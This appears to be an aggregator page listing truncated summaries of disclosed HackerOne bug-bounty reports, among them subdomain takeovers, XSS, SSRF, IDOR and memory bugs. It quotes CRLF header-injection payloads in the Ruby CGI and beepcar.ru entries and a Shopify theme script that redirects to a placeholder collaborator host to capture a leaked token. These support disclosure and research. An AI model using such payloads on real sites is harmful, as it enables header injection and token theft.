HackerOne, most viewed

15369 matches found

Hacker One
added 2016/12/11 3:49 p.m. | 63 views

Gratipay: Gratipay uses the random module's cryptographically insecure PRNG.

Dear Gratipay bug bounty team, Summary: Gratipay currently uses the random module's pseudo-random number generator, which is not a cryptographically secure PRNG, as stated in the docs: The pseudo-random generators of this module should not be used for security purposes. For security or...

Exploits: 0

Hacker One
added 2016/11/29 3:04 a.m. | 63 views

HackerOne: Internal attachments can be exported via "Export as .zip" feature

Hello HackerOne Team, this newly disclosed report, 182358 (Partial disclosure of report activity through new "Export as .zip" feature), was not completely fixed. I have found that I can still view the attachment after it has been removed from the thread. Best PoC is this 182358 since this is the newly fi...

AI score: 0.5
Exploits: 0

Hacker One
added 2016/11/11 10:43 p.m. | 63 views

Ubiquiti Inc.: Subdomain Takeover (moderator.ubnt.com)

Hello Team, this report is the same as 179110. One of your subdomains, http://moderator.ubnt.com, is pointing towards 216.58.203.243: moderator.ubnt.com 216.58.203.243 ghs.google.com 216.58.203.243 ghs.l.google.com F134183. And it is unclaimed; when I open it, it is showing F134184. Impact: An attacker can...

AI score: 0.2
Exploits: 0

Hacker One
added 2016/09/28 7:20 p.m. | 63 views

Shopify: Add signature to transactions without any permission

Hi, I found an endpoint for transaction signing, but user permission is not checked on this endpoint, so a user without any permission in the shop can add a signature to transactions! Endpoint: /admin/securefiles.json Parameters:...

AI score: 0.7
Exploits: 0

Hacker One
added 2016/09/07 5:34 p.m. | 63 views

Internet Bug Bounty: Cross-protocol attack on TLS using SSLv2 (DROWN) (CVE-2016-0800)

General: DROWN was responsibly disclosed to the OpenSSL team prior to the public disclosure. This OpenSSL blog post, by Viktor Dukhovni and Emilia Käsper, describes the vulnerability: https://www.openssl.org/blog/blog/2016/03/01/an-openssl-users-guide-to-drown/ This is probably a good opportunity ...

CVSS: 4.3 | AI score: 7.8 | EPSS: 0.82112
Exploits: 2

Hacker One
added 2016/06/12 6:04 p.m. | 63 views

Paragon Initiative Enterprises: SMTP server allows anonymous relay from internal addresses to internal addresses

Hello, Issue description: your incoming SMTP servers, provided by Google, seem to be accepting, without authentication, mails from addresses @paragonie.com and destined for addresses @paragonie.com. This can greatly ease spear-phishing attacks, as users usually put much trust into emails coming fro...

AI score: 6.9
Exploits: 0

Hacker One
added 2016/03/09 7:17 p.m. | 63 views

Bumble: Account Takeover

Hello, this is regarding an account takeover via the "import image from Facebook" option. When we import FB photos, a link with a token is generated which is valid for any user, and it can be used to replace the user's linked FB account with the attacker's FB account, and then login via FB to take over the account. Note: I tested...

AI score: 1.2
Exploits: 0

Hacker One
added 2016/02/01 10:00 a.m. | 63 views

Ruby on Rails: Regarding [CVE-2016-0752] Possible Information Leak Vulnerability in Action View

Possible Information Leak Vulnerability in Action View. There is a possible directory traversal and information leak vulnerability in Action View. This was meant to be fixed on CVE-2016-0752. However the 3.2 patch was not covering all the scenarios. This vulnerability has been assigned the CVE...

CVSS: 5 | AI score: 1.6 | EPSS: 0.95537
Exploits: 11

Hacker One
added 2015/11/24 1:20 a.m. | 63 views

Radancy: SSL certificate invalid date

This SSL certificate is either expired or not yet valid. Some browsers will continue connecting to the site after presenting the user with the warning, while others will prompt the user with a dialog box requesting their approval to proceed. These warnings are extremely confusing for the typical...

AI score: 2.1
Exploits: 0

Hacker One
added 2015/09/18 12:00 a.m. | 63 views

Internet Bug Bounty: Integer overflow in unserialize() (32-bits only)

https://bugs.php.net/bug.php?id=68044...

CVSS: 7.5 | AI score: 7.1 | EPSS: 0.28862
Exploits: 1

Hacker One
added 2025/09/17 7:53 p.m. | 62 views

curl: Security Analysis Report: CURL Integer Overflow Vulnerability

Vulnerability Overview. Vulnerability Type: Integer Overflow in HTTP chunked encoding. Location in Source: lib/http_chunks.c line 173, lib/curlx/strparse.c lines 185–186. Impact: Integer overflow leads to memory corruption; can cause buffer overflow; results in Denial of Service (DoS) for curl; Potential...

AI score: 6.9
Exploits: 0

Hacker One
added 2023/12/28 6:55 a.m. | 62 views

curl: Buffer Overflow Vulnerability in WebSocket Handling

Vulnerability description not provided...

AI score: 7.1
Exploits: 0

Hacker One
added 2023/11/10 6:31 p.m. | 62 views

FetLife: Able to see highest poll result without voting or view result

Vulnerability description not provided...

AI score: 7.1
Exploits: 0

Hacker One
added 2023/10/19 9:53 a.m. | 62 views

HackerOne: Hacker email disclosed on submission at HackerOne hacktivity

Vulnerability description not provided...

AI score: 7.1
Exploits: 0

Hacker One
added 2023/07/26 11:18 a.m. | 62 views

HackerOne: Takeover of hackerone.engineering via Github

The hacker was able to take over the hackerone.engineering domain after a brief misconfiguration window on GitHub. They claimed the domain in their own repository while the DNS records were still pointing towards GitHub. The issue has been resolved and no malware was found on the site during the...

AI score: 6.9
Exploits: 0

Hacker One
added 2023/03/11 7:22 p.m. | 62 views

GitHub: Authentication bypass on gist.github.com through SSH Certificates

An authentication bypass vulnerability was found in GitHub Enterprise Server that allowed unauthorized access to modify other users' secret gists through SSH certificates. The vulnerability affected all versions of GitHub Enterprise Server prior to 3.9 and was fixed in versions 3.4.18, 3.5.15,...

CVSS: 7.7 | AI score: 5.7 | EPSS: 0.00462
Exploits: 0

Hacker One
added 2022/10/22 11:43 a.m. | 62 views

Nextcloud: Mail app - blind SSRF via smtpHost parameter

A blind SSRF vulnerability was discovered in the Nextcloud Mail application, allowing an attacker to retrieve services running locally on the server and scan the internal network for information. The vulnerability was found in the smtpHost parameter and could be exploited by any user with the mai...

CVSS: 5 | AI score: 4.6 | EPSS: 0.00919
Exploits: 1

Hacker One
added 2022/08/10 3:47 p.m. | 62 views

GitLab: Stored-XSS with CSP-bypass via labels' color

Stored-XSS with CSP-bypass was discovered in GitLab that allowed attackers to execute arbitrary actions on behalf of victims at the client side. This was possible due to the import of unsanitized label colors from GitHub, which led to the execution of malicious JavaScript code...

AI score: 7.8
Exploits: 0

Hacker One
added 2022/04/29 10:55 p.m. | 62 views

U.S. Dept Of Defense: CVE-2020-3187 - Unauthenticated Arbitrary File Deletion

A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files on a targeted...

CVSS: 7.5 | AI score: 0.8 | EPSS: 0.96595
Exploits: 4

Hacker One
added 2022/04/13 1:30 p.m. | 62 views

EXNESS: subdomain takeover at odoo-staging.exness.io

Domain: https://odoo-staging.exness.io PoC: https://odoo-staging.exness.io Cname: $ host odoo-staging.exness.io odoo-staging.exness.io is an alias for exness-stg.odoo.com. exness-stg.odoo.com has address 141.95.172.222 exness-stg.odoo.com mail is handled by 10 eu123a.odoo.com. Impact: Scam, phishin...

AI score: 0.3
Exploits: 0

Hacker One
added 2022/03/27 6:18 p.m. | 62 views

Zomato: Attacker shall receive order updates on WhatsApp for users who have activated WhatsApp notification

H Summary: 1. Order IDs are IDOR (Insecure Direct Object Reference). 2. When users activate WhatsApp notifications, an attacker would start receiving the notifications about their order without user interaction. Proof Of Concept: When a user orders from a restaurant he/she can start WhatsApp notificati...

AI score: 1
Exploits: 0

Hacker One
added 2022/03/19 8:41 a.m. | 62 views

Nextcloud: SMTP Command Injection in iCalendar Attachments to Emails via Newlines

Note: This is similar to 1509216, but has a new source/attack vector. Apologies for not picking this up earlier. Summary: When users receive iCalendar attachments in Mail, there is an option to add it to their calendar: ██████████ Once they add it to calendar, a PUT request is sent: PUT...

CVSS: 3.5 | AI score: 0.4 | EPSS: 0.02421
Exploits: 1

Hacker One
added 2021/09/20 3:04 p.m. | 62 views

U.S. Dept Of Defense: Expired SSL Certificate allows credentials to be stolen

Hi security Team! I've found this website with no valid SSL Certificate. https://██████████ The certificate expired 314 days ago. Impact: An error message can appear on the page and a user can have his credentials stolen by an attacker capturing the network data. System Hosts: ███████ Affected Products and...

AI score: 1.1
Exploits: 0

Hacker One
added 2021/06/03 9:36 p.m. | 62 views

GitHub Security Lab: Python: Add support of clickhouse-driver package

This bug was reported directly to GitHub Security Lab...

AI score: 1.1
Exploits: 0

Hacker One
added 2021/05/26 2:31 a.m. | 62 views

Reddit: XSS

Hi security team, I have found an XSS in old.reddit.com and in reddit.com. Description: Cross-site scripting, also known as XSS, is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the...

AI score: 2
Exploits: 0

Hacker One
added 2021/05/21 1:10 a.m. | 62 views

Ruby: Ruby's CGI library has HTTP response splitting (HTTP header injection) that leaks secret information

PoC1: #!/usr/bin/env ruby require 'cgi' cgi = CGI.new url = "http://example.jp\r\nSet-Cookie: foo=bar;" # External Parameter print cgi.header('status' => '302 Found', 'Location' => url) Actual Result1: $ curl -s -i http://localhost:8080/cgi-bin/cgi.ru HTTP/1.1 302 Found Date: Fri, 21 May 2021 00:46:33 G...

CVSS: 6.5 | AI score: 7.2 | EPSS: 0.04569
Exploits: 1

Hacker One
added 2021/04/29 8:31 p.m. | 62 views

curl: CVE-2021-22901: TLS session caching disaster

Summary: lib/vtls/openssl.c ossl_connect_step1 sets up the ossl_new_session_cb session id callback with SSL_CTX_sess_set_new_cb, and adds association from data_idx and connectdata_idx to current conn and data respectively: SSL_CTX_set_session_cache_mode(backend->ctx, SSL_SESS_CACHE_CLIENT | SSL_SESS_CACHE_NO_INTERNAL);...

CVSS: 6.8 | AI score: 8 | EPSS: 0.60122
Exploits: 1

Hacker One
added 2021/03/19 4:53 p.m. | 62 views

Open-Xchange: Null pointer dereference in lib-sieve after calling sieve_binary_block_index

There are some places where the program calls the function sieve_binary_block_index without checking the return value, mainly in sieve-binary-dumper.c. Such as: pigeonhole/src/lib-sieve/sieve-binary-dumper.c: bool sieve_binary_dumper_run(struct sieve_binary_dumper *dumper, struct ostream *stream, bool verbose) struct...

AI score: 7
Exploits: 0

Hacker One
added 2021/02/11 10:12 p.m. | 62 views

Rockstar Games: Open redirect on https://signin.rockstargames.com/connect/authorize/rsg

In this report, the researcher found that a previously-addressed Open Redirect vulnerability on https://signin.rockstargames.com/connect/authorize/rsg had once again become exploitable. We were able to quickly re-apply our previous solution and once again resolve the vulnerability...

AI score: 0.2
Exploits: 0

Hacker One
added 2020/12/28 1:13 p.m. | 62 views

Shopify: Screenshot Service leaks X-ABS-App-Token

1. Login and create a development store. 2. Start Burp Suite and open a Burp Collaborator client, then copy the collaborator payload. 3. Edit the section header.liquid of your current theme, adding this: window.location="https://pasteherecollaborator/"; Finally go to...

AI score: 0.4
Exploits: 0

Hacker One
added 2020/08/27 7:24 p.m. | 62 views

U.S. Dept Of Defense: IDOR to Account Takeover on https://████/index.html

Hello Team! Summary: I found an IDOR when you wish to update your profile on https://███████/ after your login through the https://██████████/signIn/signIn.html website. This IDOR gives you the opportunity to change the origin email for the registered account by changing the ID parameter on th...

AI score: 0.1
Exploits: 0

Hacker One
added 2020/07/27 11:47 a.m. | 62 views

U.S. Dept Of Defense: [██████████.mil] Cisco VPN Service Path Traversal

Hi team. Summary: The Cisco VPN Service at ██████.mil is vulnerable to the CVE-2020-3452 vulnerability, which allows path traversal within the web service's file system on the targeted device. Steps to Reproduce: Make a GET request to: http...

CVSS: 5 | AI score: 1 | EPSS: 0.99992
Exploits: 24

Hacker One
added 2020/05/18 7:58 p.m. | 62 views

Node.js third-party modules: [keyd] Prototype pollution

I would like to report a prototype pollution vulnerability in the keyd module. It allows an attacker to inject properties on Object.prototype. Module: module name: keyd; version: 1.3.4; npm page: https://www.npmjs.com/package/keyd. Module Description: A small library for using and manipulating key paths i...

AI score: 0.8
Exploits: 0

Hacker One
added 2020/02/26 5:04 a.m. | 62 views

Internet Bug Bounty: PHP link() silently truncates after a null byte on Windows

The bug submitted at: https://bugs.php.net/bug.php?id=78862 The security advisory at: https://nvd.nist.gov/vuln/detail/CVE-2019-11044 The issue allows remote attackers to read or write arbitrary files via crafted input to an application that calls the vulnerable function. As demonstrated by a...

CVSS: 5 | AI score: 6.7 | EPSS: 0.05124
Exploits: 2

Hacker One
added 2020/01/27 4:49 p.m. | 62 views

Node.js: napi_get_value_string_X allow various kinds of memory corruption

Summary: napi_get_value_string_latin1, napi_get_value_string_utf8, napi_get_value_string_utf16 are vulnerable to buffer overflows, partially due to an integer underflow. Description: napi_get_value_string_latin1, napi_get_value_string_utf8, and napi_get_value_string_utf16 behave like this: 1. If the output pointer is...

CVSS: 9.3 | AI score: 0.1 | EPSS: 0.07646
Exploits: 1

Hacker One
added 2019/12/26 12:27 p.m. | 62 views

U.S. Dept Of Defense: Publicly accessible Grafana install allows pivoting to Prometheus datasource

Summary: A publicly accessible Grafana install exposes semi-sensitive Dashboards. This also exposes the Prometheus proxied datasources, which allow direct queries to a Prometheus instance, which reveals sensitive data and opens the instance up to potential DoS via crafted requests. Description: Impa...

AI score: 0.5
Exploits: 0

Hacker One
added 2019/12/16 3:26 p.m. | 62 views

DataStax: Helpdesk Takeover at dmc.datastax.com

Summary: DNS record dmc.datastax.com is pointing to stale dmc-support.zendesk.com domain on Zendesk which is available for takeover. DNS Stale Records: F661014 Proof of Concept: There was no helpdesk configured at this address, which means that the address was available and anyone could claim it....

AI score: 7
Exploits: 0

Hacker One
added 2019/08/05 11:58 a.m. | 62 views

GitLab: Head pipeline leaked to unauthorized users via blocking merge request feature

Summary: GitLab allows for public and internal projects to restrict the visibility of pipelines to project members only. Then, only project members should have access to the pipeline information. GitLab recently added the blocking merge request feature. This feature can be used to leak the head...

CVSS: 4 | AI score: 6.4 | EPSS: 0.01141
Exploits: 1

Hacker One
added 2019/08/01 5:45 a.m. | 62 views

Internet Bug Bounty: Out of Bounds Memory Read in php_jpg_get16

I have found and reported an out of bounds memory read in PHP php_jpg_get16. When the PHP EXIF extension is parsing EXIF information from an image, e.g. via the exif_read_data function, in PHP versions 7.1.x below 7.1.30, 7.2.x below 7.2.19 and 7.3.x below 7.3.6 it is possible to supply it with data that will...

CVSS: 6.4 | AI score: 8.4 | EPSS: 0.04068
Exploits: 1

Hacker One
added 2019/07/11 4:32 p.m. | 62 views

curl: Insecure Frame (External)

Summary: Insecure Frame (External). Steps To Reproduce: Vulnerability Details: identified an external insecure or misconfigured iframe. Remedy: Apply sandboxing in inline frame. For untrusted content, avoid the usage of the seamless attribute and allow-top-navigation, allow-popups and allow-scripts in...

AI score: 7.3
Exploits: 0

Hacker One
added 2019/04/08 5:29 a.m. | 63 views

Snapchat: Server-Side Request Forgery using Javascript allows exfiltrating data from Google Metadata

Hey there, I was looking at your ads site with @daeken; we found some weird behavior in the import function of the creative app. Here are the steps: POC - Login to https://business.snapchat.com/ - Go to creative library - New Creative - Under "Topsnap Media", click on "Create" - Click on any of t...

AI score: 6.8
Exploits: 0

Hacker One
added 2019/03/04 10:43 a.m. | 62 views

Nextcloud: Predictable Random Number Generator

Description: The mobile application uses a predictable Random Number Generator (RNG). Under certain conditions this weakness may jeopardize mobile application data encryption or other protection based on randomization. For example, if encryption tokens are generated inside of the application and an...

AI score: 7
Exploits: 0

Hacker One
added 2018/12/11 5:16 p.m. | 62 views

RATELIMITED: information disclosure which leaks the Apache version

Hello ratelimited team! I have found an information disclosure which leaks the Apache version. Link: https://social.ratelimited.me/manual/en/index.html Impact: Leaking the Apache HTTP server version...

AI score: 1.1
Exploits: 0

Hacker One
added 2018/09/29 12:36 a.m. | 62 views

h1-5411-CTF: H1-5411 CTF Writeup

So, HackerOne posted a tweet about the Meme CTF where a barcode was in the tweet image; by scanning it and decoding from hex I found this link: https://h1-5411.h1ctf.com/ where we can create/generate memes, and for generating the meme this was used from GitHub, which I found in source code analysis...

AI score: 7.7
Exploits: 0

Hacker One
added 2018/04/20 9:12 a.m. | 62 views

Node.js third-party modules: [cloudcmd] Stored XSS in the filename when listing directories

I would like to report a Stored XSS issue in the module cloudcmd. It allows executing malicious JavaScript code in the user's browser. Module: module name: cloudcmd; version: 9.1.5; npm page: https://www.npmjs.com/package/cloudcmd. Module Description: Cloud Commander is an orthodox web file manager with...

AI score: 6
Exploits: 0

Hacker One
added 2018/04/03 7:26 p.m. | 62 views

Mail.ru: [dl.beepcar.ru] CRLF Injection

CRLF Injection via GET request. PoC: https://dl.beepcar.ru/qwerty%0ASet-Cookie:%20test=qwerty;domain=.beepcar.ru HTTP Response: HTTP/1.1 302 Moved Temporarily Server: nginx/1.12.2 Date: Tue, 03 Apr 2018 19:20:31 GMT Content-Type: text/html Content-Length: 161 Connection: close Location:...

AI score: 1.2
Exploits: 0

Hacker One
added 2017/12/04 10:50 a.m. | 62 views

Mapbox: Admin Panel Accessed (OAuth Bypassed)

On December 4, 2017, @aneeskhan reported an authentication bypass vulnerability on a Mapbox internal portal. The vulnerability allowed them to bypass OAuth authentication and generate a valid session for the site. This session was then used by @aneeskhan to access information on the portal which...

AI score: 7.1
Exploits: 0

Hacker One
added 2017/10/31 2:25 p.m. | 62 views

Gratipay: I am The bug

I am the bug. I found a bug in your site, here it is F234717. My friends are the greatest hackers hackerone.com/s4k16 and smziaurrashid told me you will give me $$$ for my father F234723...

AI score: 6.7
Exploits: 0

Hacker One
added 2017/06/29 6:32 p.m. | 62 views

WakaTime: Mailgun misconfiguration

During subdomain enumeration I found the following subdomain: email.mailgun.wakatime.com. Looking at the CNAME records, it is pointing to Mailgun. host email.mailgun.wakatime.com: email.mailgun.wakatime.com is an alias for mailgun.org. mailgun.org has address 34.225.110.231 mailgun.org has address...

AI score: 0.3
Exploits: 0

Hacker One
added 2016/12/14 8:17 p.m. | 62 views

PortSwigger Web Security: HTTP OPTION Method is Enabled on portswigger.net

Enabled OPTION method on web server allows unauthorized blind submission of privileged GET requests...

AI score: 1.5
Exploits: 0

Total number of security vulnerabilities: 5000